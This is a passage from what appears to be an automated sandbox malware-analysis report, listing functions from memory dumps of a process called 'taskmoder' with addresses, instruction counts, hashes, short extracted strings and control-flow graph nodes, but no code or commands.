                                                                                        • Instruction Fuzzy Hash: 8A819174E012088FDB58DFA9C6449DDBBF2AF88300F2080AAD419BB365DB729E45CF54
                                                                                        Function 00BDA200 Relevance: .1, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe4dca8783775ae213102fe8e76ba2ef1c0562311339d8f5d91d29620c4a4d5f
                                                                                        • Instruction ID: daf6ee1483c76f4eb140d30924c69ab737276cc9d8dcc2e26453566fe9c7ef07
                                                                                        • Opcode Fuzzy Hash: fe4dca8783775ae213102fe8e76ba2ef1c0562311339d8f5d91d29620c4a4d5f
                                                                                        • Instruction Fuzzy Hash: A951C375E1022A9FCB44CFA9D841AEEFBB1FF48314F048A6AD425A7250D7749A01CF90
                                                                                        Function 029289F8 Relevance: .1, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8737a70de45a2386b05accbaed97121112b05a42a08aeab433a8ec3cbfea1951
                                                                                        • Instruction ID: ca28145bf816e3c31223e79a0086b395249d99cdfe17c43e8011953271e4accd
                                                                                        • Opcode Fuzzy Hash: 8737a70de45a2386b05accbaed97121112b05a42a08aeab433a8ec3cbfea1951
                                                                                        • Instruction Fuzzy Hash: 97512574A01214DFCB04DF98D884AEDFBB1FB49315F18D069E809AB396CB31A946CB64
                                                                                        Function 00BDBBCC Relevance: .1, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e49a5381a57bdb128a75b931ebf1a2cbc315cb9bc69cab8d165b57ff46143768
                                                                                        • Instruction ID: 8967550b1e61310e04067c9fa46d35a95112b461d8b5cead1d625f7a2cb8e4b4
                                                                                        • Opcode Fuzzy Hash: e49a5381a57bdb128a75b931ebf1a2cbc315cb9bc69cab8d165b57ff46143768
                                                                                        • Instruction Fuzzy Hash: 1D41AE75E11209DFDB08DFA9D5819AEBBF2FF88310F14806AE515A7320DB359981CF90
                                                                                        Function 00BDBBD0 Relevance: .1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 122218a1a9c488b963b8a3becc9efa4aa749f65cddbf0cfa46447ef6241ab3a8
                                                                                        • Instruction ID: aebaa24b150c198d1bd9fdb3bb8723a4c743f5bd26364c79e47f0a6c54373f5c
                                                                                        • Opcode Fuzzy Hash: 122218a1a9c488b963b8a3becc9efa4aa749f65cddbf0cfa46447ef6241ab3a8
                                                                                        • Instruction Fuzzy Hash: CF419F75E11209DFDB08DFA9D5859AEBBF2FF88310F14806AE515A7320DB359981CF90
                                                                                        Function 00A00B8D Relevance: .1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a53db3f80de6298431ffc0db824ec48a0b6ad673bddcc2966a097d327d5b0ae6
                                                                                        • Instruction ID: 8a4a5d3d0e8ca706cec033b0bfd01f2d9ae5cbd5f5ceb69cb29388ab5ccc56b1
                                                                                        • Opcode Fuzzy Hash: a53db3f80de6298431ffc0db824ec48a0b6ad673bddcc2966a097d327d5b0ae6
                                                                                        • Instruction Fuzzy Hash: 96111670D0924CEFCB15DFA8E494BADBBB0EB06309F6041EAC425A7291D3759A41DB05
                                                                                        Function 00A00473 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1973 a00473-a00485 1974 a00487-a004a0 1973->1974 1975 a00429-a00431 1973->1975 1977 a004a2 1974->1977 1978 a004a7-a004b8 1974->1978 1979 a00452 1975->1979 1980 a00433-a0043c 1975->1980 1977->1978 1986 a004d9 1978->1986 1987 a004ba-a004c3 1978->1987 1983 a00455-a0046a 1979->1983 1981 a00443-a00446 1980->1981 1982 a0043e-a00441 1980->1982 1985 a00450 1981->1985 1982->1985 1985->1983 1988 a004dc-a004e2 1986->1988 1990 a004c5-a004c8 1987->1990 1991 a004ca-a004cd 1987->1991 1993 a004ea-a004f0 1988->1993 1992 a004d7 1990->1992 1991->1992 1992->1988
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q
                                                                                        • API String ID: 0-127220927
                                                                                        • Opcode ID: 44492270a96ff5c6a6b318074ac4f1f60326e09d864ecaec020a780d7b14c1be
                                                                                        • Instruction ID: 6b09c1df5d4ffe6a187c39f884e5f80b56975cab72ba1551fa4f6d43de876c89
                                                                                        • Opcode Fuzzy Hash: 44492270a96ff5c6a6b318074ac4f1f60326e09d864ecaec020a780d7b14c1be
                                                                                        • Instruction Fuzzy Hash: D2213A70E0924CDFCB16CFA8E554AACBFB0AF06311F2085DAC545EB2A2D3355E44CB45
                                                                                        Function 02928BA8 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2010 2928ba8-2928bc6 2011 2928bc8 2010->2011 2012 2928bcd-2928c20 2010->2012 2011->2012 2025 2928c23 call bd9ca8 2012->2025 2026 2928c23 call bd9e5a 2012->2026 2018 2928c28-2928c2f 2019 2928c50 2018->2019 2020 2928c31-2928c3a 2018->2020 2021 2928c53-2928c56 2019->2021 2022 2928c41-2928c44 2020->2022 2023 2928c3c-2928c3f 2020->2023 2024 2928c4e 2022->2024 2023->2024 2024->2021 2025->2018 2026->2018
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q
                                                                                        • API String ID: 0-127220927
                                                                                        • Opcode ID: fc2b4b3a4d756cb5efd247c20aad7d2cd7638d74a5a398b06c419bacae112a72
                                                                                        • Instruction ID: 3edac0c3eac929d9eadb6f9814e4f697ded60848d12195f258a529e634055a31
                                                                                        • Opcode Fuzzy Hash: fc2b4b3a4d756cb5efd247c20aad7d2cd7638d74a5a398b06c419bacae112a72
                                                                                        • Instruction Fuzzy Hash: 0B1107B0E012099FCB08EFA8C5406AEBBF5FF48700F6484AAD418B7355EB345A44CBA1
                                                                                        Function 00A00488 Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q$$]q
                                                                                        • API String ID: 0-127220927
                                                                                        • Opcode ID: c5d3a9143fbbc0b31cc6b8718016da3b36a9facaa931345b9c877d201463b817
                                                                                        • Instruction ID: f68019bd9534dd406b4120c7d12afcd677336d6cdc4fce601a2ef7a0bfbbbdbf
                                                                                        • Opcode Fuzzy Hash: c5d3a9143fbbc0b31cc6b8718016da3b36a9facaa931345b9c877d201463b817
                                                                                        • Instruction Fuzzy Hash: 67011470E0020CEFCB18DFE8E684A9CBBB1AB44310F2084AAC805A7390D7355E44DB45
                                                                                        Function 02925C30 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        • Opcode ID: 36f62a9c980b1bfa69f07035c91ffb109f182c293c3437f6cc9731d009458a7e
                                                                                        • Instruction ID: 8f51dff60c9c2544bcf29eb64d93bd314af5e03be0ed91a4e0ab50a046d962a9
                                                                                        • Opcode Fuzzy Hash: 36f62a9c980b1bfa69f07035c91ffb109f182c293c3437f6cc9731d009458a7e
                                                                                        • Instruction Fuzzy Hash: E4A19A30A006159FDB18DF69C8809AAFBB5FF88310B55C669D8299B755D730FC45CBA0
                                                                                        Function 00A00F1D Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: P[]q
                                                                                        • API String ID: 0-2729931612
                                                                                        • Opcode ID: 8132a0b30398847bc979e9a4cdec95e2ead070dccdf2cb14ae39b221f5508359
                                                                                        • Instruction ID: dc24511f6f9b0cf1477343db25bd14161a878a67e559b1e845f693af3f3930e3
                                                                                        • Opcode Fuzzy Hash: 8132a0b30398847bc979e9a4cdec95e2ead070dccdf2cb14ae39b221f5508359
                                                                                        • Instruction Fuzzy Hash: 7B218E7080924CEFCB26CB64E554FADBBB0EF02305F2445EAD045AB2E2C7755E40EB01
                                                                                        Function 00BDFC48 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Haq
                                                                                        • API String ID: 0-725504367
                                                                                        • Opcode ID: 121ee86ee927370ef6c006158197977607171fc2dac23d1c329765ca10d96a3f
                                                                                        • Instruction ID: 7493c8382c47a03b1500a1353abf97117d953fe388a1a142c3bf520216b37ad2
                                                                                        • Opcode Fuzzy Hash: 121ee86ee927370ef6c006158197977607171fc2dac23d1c329765ca10d96a3f
                                                                                        • Instruction Fuzzy Hash: 3C312374D0520AEFDB44DFA8DA456ADFBB1EF44311F2881AA8805A7361E7309E54DB81
                                                                                        Function 00BDFC58 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Haq
                                                                                        • API String ID: 0-725504367
                                                                                        • Opcode ID: 2cfc568a7a361a5740afa8c5f573da244bb53b29ab4f2543a5d6ca2bd2abdc7c
                                                                                        • Instruction ID: a3b11011b08aae57d48a3df1ec3ed434c556272d94b2bad37ed5b342f9ed1229
                                                                                        • Opcode Fuzzy Hash: 2cfc568a7a361a5740afa8c5f573da244bb53b29ab4f2543a5d6ca2bd2abdc7c
                                                                                        • Instruction Fuzzy Hash: 1C21F074E0120EEFCB44DFA8DA456ADFBB1EB44311F2486AA9815A7350EB309F40DB80
                                                                                        Function 02928B98 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q
                                                                                        • API String ID: 0-1007455737
                                                                                        • Opcode ID: b8a14198a975c2f06c6e79bf2c7c584a3669c56324002e4828f5ab5f97dc5e9e
                                                                                        • Instruction ID: c2ccfe3e0a5f9872244e3ee0ef601cef69589b1c6f22708dc0f79ea9222348dc
                                                                                        • Opcode Fuzzy Hash: b8a14198a975c2f06c6e79bf2c7c584a3669c56324002e4828f5ab5f97dc5e9e
                                                                                        • Instruction Fuzzy Hash: EB1149B0E01209DFCB48EFA8C4446AEBBF1FF48300F1484AAD419BB391EB345A45CB91
                                                                                        Function 00A00B14 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q
                                                                                        • API String ID: 0-1007455737
                                                                                        • Opcode ID: 437a6dbe4967c84093f689fd8f37d722c87d9ef24579eb732a07b406bdb74ef2
                                                                                        • Instruction ID: b256553557406139baa2d0afa8d29b1f36b50869394a216a355dfdb73ac22e26
                                                                                        • Opcode Fuzzy Hash: 437a6dbe4967c84093f689fd8f37d722c87d9ef24579eb732a07b406bdb74ef2
                                                                                        • Instruction Fuzzy Hash: 60110970E0934CDFCB16DFB8E494BACBBB0AB02305F2441EAD445A72A1D7B55E95DB01
                                                                                        Function 00A002D8 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PH]q
                                                                                        • API String ID: 0-3168235125
                                                                                        • Opcode ID: 2a94c10298f9d35b96ecae05557868dea708ae78f7263f7dc558c2325d095057
                                                                                        • Instruction ID: 5b404894f82c92f14879da7fc28e7ec1099a436ebfc9baf68c678abff97c7f12
                                                                                        • Opcode Fuzzy Hash: 2a94c10298f9d35b96ecae05557868dea708ae78f7263f7dc558c2325d095057
                                                                                        • Instruction Fuzzy Hash: 90E0923051D2C85FC7178B7458A5BEE3FB4AF43301F1900EAC084CB2A3DA284C0AC792
                                                                                        Function 00BDFDD6 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M
                                                                                        • API String ID: 0-3664761504
                                                                                        • Opcode ID: 85126dc5d97771082ef98ddf28934b8f2f4bbbe548832f1a7cfc28db9b6df14a
                                                                                        • Instruction ID: 32f78b883f7a6105ba8c431458314bb5ee71b40a570a71a63dfc7acd8e74c19a
                                                                                        • Opcode Fuzzy Hash: 85126dc5d97771082ef98ddf28934b8f2f4bbbe548832f1a7cfc28db9b6df14a
                                                                                        • Instruction Fuzzy Hash: 3DE09232F0439A9BCF05EBE8E8412DDBBF0BF85310F6445AAD298A7241D7342A15CB52
                                                                                        Function 00A002F0 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PH]q
                                                                                        • API String ID: 0-3168235125
                                                                                        • Opcode ID: 6d20316793b54ef5edcd36d3f4fb635d25f262473d3cc0d5671765a06e8175d4
                                                                                        • Instruction ID: 0fe900112d5cb3d5577fe3f99ff46a9055a961d49a1af699c5734411fc81d412
                                                                                        • Opcode Fuzzy Hash: 6d20316793b54ef5edcd36d3f4fb635d25f262473d3cc0d5671765a06e8175d4
                                                                                        • Instruction Fuzzy Hash: FED05E7091124C9FCB089BA9A514B6E77ACEB42751F100198940443264DF318D10D791
                                                                                        Function 0292C5FC Relevance: .4, Instructions: 411COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67cb5d25ca232eb196c55705412c4e661ccdeae8170e3d22c6e773cca6bad2db
                                                                                        • Instruction ID: 2ad6c2c8bf9276f4152602a050f329e3d47612e1d3672f657f0a44762c7e5cf5
                                                                                        • Opcode Fuzzy Hash: 67cb5d25ca232eb196c55705412c4e661ccdeae8170e3d22c6e773cca6bad2db
                                                                                        • Instruction Fuzzy Hash: 9B020470D00229CFDB20CFA8C985BEDBBB1BF49304F1095AAD409B7254EB749A89CF55
                                                                                        Function 0292D42C Relevance: .4, Instructions: 373COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d4f7b4c586c67ef994df48d4adbb5d716a14f9d3d2d0b2040efcc35a542f3555
                                                                                        • Instruction ID: 5c0ba6e2af475c2d575a85e339ca8f0cb216e6ab815ba7a65f617b07587fd5ce
                                                                                        • Opcode Fuzzy Hash: d4f7b4c586c67ef994df48d4adbb5d716a14f9d3d2d0b2040efcc35a542f3555
                                                                                        • Instruction Fuzzy Hash: EAF116B0D01229CFDB20CFA8C985BDDBBB1BF49304F1095AAD409B7258EB749989CF51
                                                                                        Function 02928E88 Relevance: .3, Instructions: 283COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cf917d4eac83dc7f8a7ec55611e66b9dbcbbd8afc3b87d1886bb2a32f316848b
                                                                                        • Instruction ID: ec83a52d85f0e3ec412ab7644072c98b69819aba1d4960b79da706ce565fc437
                                                                                        • Opcode Fuzzy Hash: cf917d4eac83dc7f8a7ec55611e66b9dbcbbd8afc3b87d1886bb2a32f316848b
                                                                                        • Instruction Fuzzy Hash: 32C15074A14308DFDB05EFA8E994AADBB76FF89301F108424E845673A9CB35AC47DB14
                                                                                        Function 0292D050 Relevance: .3, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 497f81801b5e5ad516867ff909b84e94d326b1b3f98fab89b34bbbe3b18a665d
                                                                                        • Instruction ID: 135346b494ffebe8c92646966c96eb12a1f8ff7ccd487896063523c7c5b85493
                                                                                        • Opcode Fuzzy Hash: 497f81801b5e5ad516867ff909b84e94d326b1b3f98fab89b34bbbe3b18a665d
                                                                                        • Instruction Fuzzy Hash: 91B1E2B0D00229CFDB24DFA9C984B9EBBB1BF49304F1091A9D409A7254EB749989CF95
                                                                                        Function 0292D046 Relevance: .3, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3154b961574a18fdc805df6045455ccd8b07912e7e2fe301476a2b271baa5f5
                                                                                        • Instruction ID: e06b92c03ca3bf35e3fcd49f86857cb48667668f3c8458ea1c46ce4a04947aeb
                                                                                        • Opcode Fuzzy Hash: a3154b961574a18fdc805df6045455ccd8b07912e7e2fe301476a2b271baa5f5
                                                                                        • Instruction Fuzzy Hash: 29B1E4B0D00229CFDB24DFA8C984BDEBBB1FF49304F1095A9D409A7254EB749989CF95
                                                                                        Function 02928E98 Relevance: .3, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7225208855905d8d885383e9fee4cbe2de0cecd8a45943c9476537e30dd8ff9f
                                                                                        • Instruction ID: 2b6f3891c04d04ce57e678bde03ef1087eb104211b66c110d9f2ea09a84e45b3
                                                                                        • Opcode Fuzzy Hash: 7225208855905d8d885383e9fee4cbe2de0cecd8a45943c9476537e30dd8ff9f
                                                                                        • Instruction Fuzzy Hash: A1B11E78614308DFDB05EFA4E954BADBB7AFF89301F108424E805673A9CB35AC46DB19
                                                                                        Function 00BD9E5A Relevance: .2, Instructions: 175COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1a3e65b7046ac46ee4b24f35c38454b40e9b2fe3d9d4786a5f87696898b885d5
                                                                                        • Instruction ID: 1ee8c958e928ea5fe6314c27c5592a4ee9a19e1cee95abdcdf7c1e7f7161b26c
                                                                                        • Opcode Fuzzy Hash: 1a3e65b7046ac46ee4b24f35c38454b40e9b2fe3d9d4786a5f87696898b885d5
                                                                                        • Instruction Fuzzy Hash: FF71D374A01208CFCB14DFA8C584ADDBBF2EF59315F2081AAD405AB365EB729D45CF54
                                                                                        Function 02928C68 Relevance: .1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 222ef893ea161fd305e9d414e5d62f90275be17bf848c85c09b80530e1500981
                                                                                        • Instruction ID: add6e7b8c1390abea2e08420be0bbb55b3ff5a845e739f6ad9f11e40c35ae342
                                                                                        • Opcode Fuzzy Hash: 222ef893ea161fd305e9d414e5d62f90275be17bf848c85c09b80530e1500981
                                                                                        • Instruction Fuzzy Hash: 94519E75A002299FCB11DF58D840A9AFBB1FF85314B15C6A6D828EB356D730ED49CBE0
                                                                                        Function 0292A064 Relevance: .1, Instructions: 144COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8b3f5a7d8318c1bfdcbe4a11b01248aab8b5cc95f2ea5311108bf61d80454cf8
                                                                                        • Instruction ID: 7a7711a21e49e829421b7bdbca9584596291374292b9770122393af8be45b5e9
                                                                                        • Opcode Fuzzy Hash: 8b3f5a7d8318c1bfdcbe4a11b01248aab8b5cc95f2ea5311108bf61d80454cf8
                                                                                        • Instruction Fuzzy Hash: B75198B4D052589FDB10CFA9D984ADEFBB1BF09304F20906AE808AB255DB359989CF54
                                                                                        Function 0292A070 Relevance: .1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1313d68e9d89db51bfa16164f294be80718b3cced54b09a6719208a961b8e126
                                                                                        • Instruction ID: 42ec48ed94f436a7206000f115c9372185e5094c754b066f424e059fe94a7c0b
                                                                                        • Opcode Fuzzy Hash: 1313d68e9d89db51bfa16164f294be80718b3cced54b09a6719208a961b8e126
                                                                                        • Instruction Fuzzy Hash: 8051A9B4D052589FDF10CFA9D984A9EFBB1BF09304F20906AE808BB255DB359989CF54
                                                                                        Function 00BD0727 Relevance: .1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2aa3c6aa805e152454e9e120afdc398c5597cd11c2a536a17535bc9341f8e209
                                                                                        • Instruction ID: f01506014faf24f99864b70316a82d1d7da525e706eb57b58cfb4b1a5eaf639c
                                                                                        • Opcode Fuzzy Hash: 2aa3c6aa805e152454e9e120afdc398c5597cd11c2a536a17535bc9341f8e209
                                                                                        • Instruction Fuzzy Hash: 5E41E3B291E3C25FD70397746864398BFF09F23219F1A41E7D480C72A3FA245919D362
